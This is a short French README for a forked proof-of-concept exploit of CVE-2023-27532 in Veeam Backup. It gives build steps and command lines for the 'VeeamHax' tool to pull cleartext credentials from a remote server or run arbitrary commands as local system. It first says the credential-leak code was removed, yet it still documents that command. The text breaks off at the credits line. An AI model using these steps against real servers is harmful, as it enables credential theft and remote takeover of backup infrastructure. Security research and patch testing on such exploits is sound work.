
Dépôt forké et suppression de la partie fuite d'identifiants. Correctifs appliqués pour la compilation.
Code de preuve de concept pour exploiter CVE-2023-27532 et soit divulguer les identifiants en clair, soit exécuter des commandes à distance.
Pour une analyse détaillée de la vulnérabilité et de l'exploitation, veuillez lire l'analyse AttackerKB de Rapid7.
Ouvrez le projet dans Visual Studio. Étant donné que les Veeam.Backup.Common.dll, Veeam.Backup.Interaction.MountService.dll et Veeam.Backup.Model.dll de Liberis sont incluses dans le projet, il n'est pas nécessaire de s'en préoccuper.
Récupérez les identifiants en clair depuis le serveur distant.
> VeeamHax.exe --target 192.168.0.100

Exécutez une commande arbitraire avec les privilèges du système local sur le serveur distant.
> VeeamHax.exe --target 192.168.0.100 --cmd calc.exe


Les recherches précédentes sur cette vulnérabilité ont été effectuées par :